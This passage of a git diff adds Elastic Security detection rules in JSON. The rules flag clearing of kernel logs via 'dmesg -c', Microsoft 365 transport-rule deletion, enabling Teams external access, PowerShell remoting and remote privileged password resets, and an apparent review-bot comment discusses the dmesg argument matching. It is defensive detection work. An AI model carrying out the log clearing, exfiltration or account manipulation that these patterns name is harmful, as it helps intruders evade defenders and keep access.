\"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1070",
+ "name": "Indicator Removal",
+ "reference": "https://attack.mitre.org/techniques/T1070/",
+ "subtechnique": [
+ {
+ "id": "T1070.002",
+ "name": "Clear Linux or Mac System Logs",
+ "reference": "https://attack.mitre.org/techniques/T1070/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 3
+ },
+ "id": "2724808c-ba5d-48b2-86d2-0002103df753_3",
+ "type": "security-rule"
+}
\ No newline at end of file
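Review bot: The `query` in this version swaps version 2's `process.args : "-c"` for `process.args == "-c"`, and in EQL `:` is a case-insensitive match while `==` is case-sensitive, so this version and version 4 in the next hunk no longer match `dmesg -C`, which util-linux documents as the clear-only form of the same operation and which version 2 covered implicitly; neither version matches the long options `--clear` and `--read-clear` either. If the move to `==` is intentional, `process.args in ("-c", "-C", "--clear", "--read-clear")` keeps the exact-match semantics without shrinking coverage; if not, restoring `:` is the smaller change. The commit gives no reason for the operator change, so a short note in the rule's `note` or `description` on which variants are in scope would also help the next maintainer.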
diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json new file mode 100644 index 00000000000..ada9f784fd4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json 
@@ -0,0 +1,110 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Attempt to Clear Kernel Ring Buffer",
+ "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"dmesg\" and process.args == \"-c\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1070",
+ "name": "Indicator Removal",
+ "reference": "https://attack.mitre.org/techniques/T1070/",
+ "subtechnique": [
+ {
+ "id": "T1070.002",
+ "name": "Clear Linux or Mac System Logs",
+ "reference": "https://attack.mitre.org/techniques/T1070/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 4
+ },
+ "id": "2724808c-ba5d-48b2-86d2-0002103df753_4",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json new file mode 100644 index 00000000000..87b31135047 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required 
to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json new file mode 100644 index 00000000000..55eea07216f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required 
to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json new file mode 100644 index 00000000000..1cc12466154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required 
to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json new file mode 100644 index 00000000000..6c37cf7bf23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json 
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement.", + "false_positives": [ + "PowerShell remoting is a dual-use protocol that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming Execution via PowerShell Remoting", + "query": "sequence by host.id with maxspan = 30s\n [network where host.os.type == \"windows\" and network.direction : (\"incoming\", \"ingress\") and destination.port in (5985, 5986) and\n network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"]\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"wsmprovhost.exe\" and not process.executable : \"?:\\\\Windows\\\\System32\\\\conhost.exe\"]\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "2772264c-6fb9-4d9d-9014-b416eed21254", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "2772264c-6fb9-4d9d-9014-b416eed21254_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json new file mode 100644 index 00000000000..c31a3814904 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + 
"Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json new file mode 100644 index 00000000000..447d22cd968 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + 
"Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json new file mode 100644 index 00000000000..f6be1c4a495 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + 
"Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json new file mode 100644 index 00000000000..3d399c3effd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + 
"https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": 